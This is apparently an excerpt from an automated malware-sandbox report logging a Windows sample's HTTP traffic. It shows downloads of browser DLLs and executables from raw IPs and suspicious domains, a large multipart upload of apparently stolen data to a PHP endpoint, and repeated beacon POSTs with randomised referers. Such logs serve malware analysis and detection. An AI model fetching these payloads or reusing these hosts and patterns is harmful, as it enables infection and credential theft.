Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /POeNDXYchB.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----2N7Y5F3OHDJMYUAI | Host: 185.7.214.239 | Content-Length: 120040 | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=9tonum6b55n3ncs7ru7lrdrlt3
Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /lava.exe HTTP/1.1 | Host: f0616071.xsph.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Music.exe HTTP/1.1 | Host: f0616073.xsph.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Tue, 04 Jan 2022 18:32:47 GMT | Content-Type: application/x-msdos-program | Content-Length: 343040 | Connection: close | Last-Modified: Tue, 04 Jan 2022 18:32:02 GMT | ETag: "53c00-5d4c5da79a842" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Tue, 04 Jan 2022 18:32:53 GMT | Content-Type: application/x-msdos-program | Content-Length: 358912 | Connection: close | Last-Modified: Mon, 03 Jan 2022 22:00:28 GMT | ETag: "57a00-5d4b4a60838eb" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 04 Jan 2022 18:33:29 GMT | Server: Apache/2.4.18 (Ubuntu) | Last-Modified: Tue, 04 Jan 2022 10:19:11 GMT | ETag: "16db40-5d4bef7dfbaec" | Accept-Ranges: bytes | Content-Length: 1497920 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdos-program
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Tue, 04 Jan 2022 18:33:36 GMT | Content-Type: application/x-msdos-program | Content-Length: 760832 | Connection: close | Last-Modified: Sun, 02 Jan 2022 14:19:12 GMT | ETag: "b9c00-5d49a1695789b" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: openresty | Date: Tue, 04 Jan 2022 18:33:50 GMT | Content-Type: application/octet-stream | Content-Length: 1531904 | Last-Modified: Tue, 04 Jan 2022 16:33:34 GMT | Connection: keep-alive | ETag: "61d476de-176000" | Expires: Tue, 11 Jan 2022 18:33:50 GMT | Cache-Control: max-age=604800 | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 04 Jan 2022 18:33:52 GMT | Server: Apache/2.4.18 (Ubuntu) | Last-Modified: Wed, 29 Dec 2021 18:27:40 GMT | ETag: "9d9d8-5d44d17c6d03f" | Accept-Ranges: bytes | Content-Length: 645592 | Content-Type: application/x-msdos-program
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Tue, 04 Jan 2022 18:33:57 GMT | Content-Type: application/x-msdos-program | Content-Length: 652928 | Connection: close | Last-Modified: Tue, 04 Jan 2022 03:19:27 GMT | ETag: "9f680-5d4b91ad73cba" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Tue, 04 Jan 2022 18:33:59 GMT | Content-Type: application/x-msdos-program | Content-Length: 334288 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "519d0-57aa1f0b0df80" | Expires: Wed, 05 Jan 2022 18:33:59 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Tue, 04 Jan 2022 18:33:59 GMT | Content-Type: application/x-msdos-program | Content-Length: 334288 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "519d0-57aa1f0b0df80" | Expires: Wed, 05 Jan 2022 18:33:59 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:02 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:02 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:03 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:03 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:05 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:05 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:05 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:05 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:06 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:06 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:08 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:12 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:12 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:13 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:13 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 04 Jan 2022 18:34:15 GMTContent-Type: application/octet-streamContent-Length: 6637149Last-Modified: Tue, 04 Jan 2022 16:37:59 GMTConnection: keep-aliveETag: "61d477e7-65465d"Expires: Tue, 11 Jan 2022 18:34:15 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 04 Jan 2022 18:34:18 GMTContent-Type: application/octet-streamContent-Length: 474112Last-Modified: Tue, 04 Jan 2022 16:40:43 GMTConnection: keep-aliveETag: "61d4788b-73c00"Expires: Tue, 11 Jan 2022 18:34:18 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnxwgte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcsijwjo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xxvce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbivn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqtuiygbd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyipaj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ixfmgcxna.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hcnexlv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shqbxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrxnaw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/2184_1641247228_8717.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyrrypaj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wpjrovehat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gemicjpf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kgdrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbwsr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tinpgbjvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://trkju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://affpnhtco.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://biuigjh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bbqijtelr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ergvrb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcppl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnleqagbe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ffijaqcca.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edakogho.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ccihwcxvgc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vnhfrdnsx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbajd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sehol.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qquvonfakj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqgjiitwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wkshgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lpdsum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pefdgmtoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.130
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://opjngj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbkjpfevn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xujjips.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://luqilpnni.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smurvjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbysostxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xggvos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upxogvba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjoorlrk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tahqfcsy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tuosodl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/8584_1641133152_551.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnrycwnvnv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqhxjo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: host-data-coin-11.com
